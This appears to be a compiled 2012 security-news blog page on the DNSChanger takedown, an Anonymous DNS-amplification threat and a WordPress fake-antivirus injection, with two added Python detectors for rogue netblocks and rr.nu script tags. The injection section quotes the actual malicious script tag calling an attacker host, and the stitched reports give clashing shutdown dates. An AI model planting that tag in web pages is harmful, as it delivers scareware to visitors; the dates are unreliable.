
No Internet Connection For DNSChanger Victims As FBI Will Shutdown DNSChanger Servers on July 9

Earlier this year the FBI carried out Operation Ghost Click to destroy the DNSChanger network and set up a replacement server which redirected DNS queries from affected computers to their correct destinations. This was a temporary solution, and the FBI has now decided that the server, which is still infecting millions of people, will be switched off on the 9th of July, this Monday. This will mean that users who are infected with the malware will be almost completely unable to access the internet normally. Users are therefore advised to check whether their computers or routers use one of the FBI-listed IP addresses for DNS queries, well before the server shutdown, by visiting dnschanger.eu or dns-ok.us. Users who want to check their configuration manually need to look out for the following IP address ranges:-
  • 85.255.112.0 to 85.255.127.255
  • 67.210.0.0 to 67.210.15.255
  • 93.188.160.0 to 93.188.167.255
  • 77.67.83.0 to 77.67.83.255
  • 213.109.64.0 to 213.109.79.255
  • 64.28.176.0 to 64.28.191.255
If an address from one of the above ranges is already set as the DNS server on the computer or router, it is infected with DNSChanger. Users can find out where to locate this DNS server information for their particular case using a wizard set up by the eco association. Future DNS queries can be made using servers such as Google's at 8.8.8.8. 
Although this date and the DNS problem have been public knowledge for several months, there are still thousands of infected computers in use in the UK. Two months ago, the FBI was still registering queries from around 20,000 UK IP addresses. From Monday, users will only be able to visit web sites from infected computers by entering the IP address directly (e.g. http://193.99.144.80 for heise.de). 



-Source (The-H)




Anonymous Threatened To Bring-down Entire Internet By Attacking DNS

The infamous Anonymous collective has threatened to bring down a substantial portion of the entire Internet by attacking the domain name system (DNS) on March 31, 2012. The attack will be part of a protest against the FBI's recent arrests of key members of Lulz and Anon, and the group confirmed that the attack is also closely related to the recent takedown of the file-sharing website Megaupload. In short, it will be the second phase of Operation Megaupload (#OpMegaupload). You could call it tit for tat by Anonymous. As a reminder, the FBI also vows to shut down the DNSChanger name servers on the 8th of this month.
Anonymous members will most likely employ a relatively little-known technique called DNS amplification, which cleverly tricks misconfigured DNS servers into spewing out torrents of useless data that in turn cause other DNS servers to add to the chaos by producing even more useless data that overwhelms limited traffic-handling capacity. Theoretically, the cascade of out-of-control servers could swamp the ability of the Internet to cope, causing millions of websites to seemingly disappear. The financial fallout from being unable to gain access to the websites of online retailers, banks and other institutions could be enormous. Experts seriously doubt that Anonymous or another group can credibly reduce the Internet to shambles in the near future, but the longer-term outlook is dimmer.





Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected

More than 200,000 websites have been infected with fake anti-virus software, and almost 30,000 unique sites have already been compromised with this fake anti-virus exploit. According to computer security group Websense, the exploit, which mostly affects sites built with WordPress, places a short piece of injected code at the bottom of a page:-
</DIV><!--END body=wrapper ==>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY>
</HTML>

When a user loads the page, they're redirected to a page in the .rr.nu top-level domain that mimics a Windows security scan, then asks them to download a malicious program to supposedly clear viruses from their computer. It's a scam that's been running in various forms for years, and Websense says it's been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.
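For site owners who want to check saved copies of their own pages for this injection, the following is an added example and not code from Websense, Sucuri or the original article. It parses the HTML and flags any script tag whose source host falls under rr.nu; the sample page is constructed, reusing only the script URL quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SUSPECT_SUFFIX = "rr.nu"  # domain suffix named in the article above


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def suspicious_scripts(html, suffix=SUSPECT_SUFFIX):
    """Return script URLs whose host is the suffix or a subdomain of it."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    flagged = []
    for src in collector.sources:
        # Relative URLs have no hostname; a trailing dot is a valid FQDN form.
        host = (urlparse(src).hostname or "").lower().rstrip(".")
        if host == suffix or host.endswith("." + suffix):
            flagged.append(src)
    return flagged


# Constructed sample page: one local script, the injected tag quoted in the
# article, a case/trailing-dot variant of it, and a look-alike that must not match.
SAMPLE_PAGE = """<html><body>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<div id="body-wrapper">post content</div><!-- end body-wrapper -->
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
<SCRIPT SRC="//IONIS901ANDSI.RR.NU./mm.php?d=1"></SCRIPT>
<script src="http://rr.nu.example.com/lib.js"></script>
</BODY></HTML>"""

if __name__ == "__main__":
    for url in suspicious_scripts(SAMPLE_PAGE):
        print("injected script reference:", url)
```
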
Earlier, in 2011, we saw similar scenarios: 614,000 web pages were compromised in a mass ASP.NET infection, the Willysy malware infected more than 6 million websites, the Lilupophilupop attack took 1 million+ web pages, and so on.


-Source (The Verge)





FBI Will Shutdown DNSChanger Name Servers On March 8 (Operation Ghost Click)

It is widely known that the FBI will shut down the DNSChanger name servers on the 8th of March, so the Internet connection of many users across the whole spectrum can be expected to be hampered during this operation, because the trojan named DNSChanger has infected millions of computers in more than 100 countries. The FBI planned the whole operation earlier, in November 2011, and it was named Operation Ghost Click. What many people do not know is that the clean DNS servers which are operated by the Internet Systems Consortium (ISC) and used to replace the rogues will be shut down on March 8, 2012.[1] From the start, the US District Court for the Southern District of New York permitted the ISC to operate these servers for a period of 120 days.[1] However, on February 17, 2012 the US government requested this deadline be extended to July 9, 2012.[2]
Barring an extension from the FBI, those systems still infected with DNSChanger will cease receiving DNS services from the ISC-controlled name servers on this date. In other words, they will not be able to properly access internet resources. This gives information security professionals less than two weeks to detect, locate and remediate any systems on their networks that are still infected. The DNSChanger Working Group (DCWG) estimates there were approximately 450,000 systems still infected as of January 28, 2012.[3] Other statistics show that DNSChanger may be present in half of the Fortune 500 companies as well as at least 27 government organizations.[4,5,6] In early February 2012 Internet Identity disclosed there were 3 million systems still infected globally.[5,6] This is a relatively small number of systems when compared to other virus outbreaks. Regardless, it represents a challenge to security professionals. This can be a substantial undertaking for large enterprises. The nature of DNSChanger was to redirect infected systems to malicious destinations. Many of these sites in turn installed additional malware. By finding a DNSChanger-infected system you will be finding a system that has additional infections.[7] This should justify the need for a thorough sweep for DNSChanger infections. Luckily there are many resources available to detect and remediate DNSChanger infections. The easiest way is to utilize a network monitoring tool to isolate DNS traffic to the ISC-operated DNS resolvers.
The offending netblocks are [1,8]:-
85.255.112.0/20 (85.255.112.0 through 85.255.127.255)
67.210.0.0/20 (67.210.0.0 through 67.210.15.255)
93.188.160.0/21 (93.188.160.0 through 93.188.167.255)
77.67.83.0/24 (77.67.83.0 through 77.67.83.255)
213.109.64.0/20 (213.109.64.0 through 213.109.79.255)
64.28.176.0/20 (64.28.176.0 through 64.28.191.255)

The FBI has published a paper with instructions on how to detect DNSChanger on individual systems.
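The two checks described on this page, the manual look at a machine's configured DNS servers and the network-side sweep for DNS traffic to the listed netblocks, can both be scripted. The following is an added example, not the FBI's or DCWG's tooling; the flow record layout (`src dst dport proto`) and all sample data are constructed assumptions.

```python
import ipaddress
import re

# Netblocks listed on this page for the DNSChanger resolvers.
DNSCHANGER_NETBLOCKS = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20", "67.210.0.0/20", "93.188.160.0/21",
    "77.67.83.0/24", "213.109.64.0/20", "64.28.176.0/20",
)]


def in_dnschanger_range(addr):
    """Return the matching netblock, or None for clean or unparsable input."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return None
    return next((net for net in DNSCHANGER_NETBLOCKS if ip in net), None)


def rogue_resolvers(resolv_conf_text):
    """Host check: nameserver entries (resolv.conf syntax) inside the ranges."""
    servers = re.findall(r"^\s*nameserver\s+(\S+)", resolv_conf_text, re.MULTILINE)
    return [s for s in servers if in_dnschanger_range(s)]


def infected_clients(flow_lines):
    """Network check: map each client to the listed resolvers it queried."""
    hits = {}
    for line in flow_lines:
        parts = line.split()
        if len(parts) != 4 or parts[2] != "53":
            continue  # malformed record or not DNS traffic
        src, dst = parts[0], parts[1]
        if in_dnschanger_range(dst):
            hits.setdefault(src, set()).add(dst)
    return hits


# Constructed sample data (not real captures).
SAMPLE_RESOLV_CONF = "# sample\nnameserver 85.255.112.36\nnameserver 8.8.8.8\n"
SAMPLE_FLOWS = [
    "10.0.0.15 8.8.8.8 53 udp",
    "10.0.0.22 67.210.15.255 53 udp",  # last address of a listed /20
    "10.0.0.22 93.188.167.1 53 udp",
    "10.0.0.31 93.188.168.1 53 udp",   # just outside the listed /21
    "10.0.0.40 77.67.83.9 443 tcp",    # in range, but not DNS
    "malformed line",
]

if __name__ == "__main__":
    print("rogue resolvers configured:", rogue_resolvers(SAMPLE_RESOLV_CONF))
    for client, servers in infected_clients(SAMPLE_FLOWS).items():
        print(client, "queried", sorted(servers))
```
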


-Source (FBI, Infosec Island)



DNSChanger Trojan Targeting US Govt Sites


A security researcher suspects that the malware named DNSChanger is still targeting US Govt sites. The researcher even said that hundreds of Govt sites are infected with that particular malware.

Brief About DNSChanger:- 
The malware, known as the “DNSChanger Trojan,” quietly alters the host computer’s Internet settings to hijack search results and to block victims from visiting security sites that might help scrub the infections. DNSChanger frequently was bundled with other types of malware, meaning that systems infected with the Trojan often also host other, more nefarious digital parasites.

Earlier, a few people were busted for using the Trojan to control more than four million computers in over 100 countries, including an estimated 500,000 in the United States. Investigators timed the arrests with a coordinated attack on the malware's infrastructure. The two-pronged attack was intended to prevent miscreants from continuing to control the network of hacked PCs, and to give Internet service providers an opportunity to alert customers with infected machines. Computers still infected with DNSChanger are up against a countdown clock. As part of the DNSChanger botnet takedown, the feds secured a court order to replace the Trojan's DNS infrastructure with surrogate, legitimate DNS servers. But those servers are only allowed to operate until March 8, 2012. Unless the court extends that order, any computers still infected with DNSChanger may no longer be able to browse the Web.


-Source (Krebs on Security)


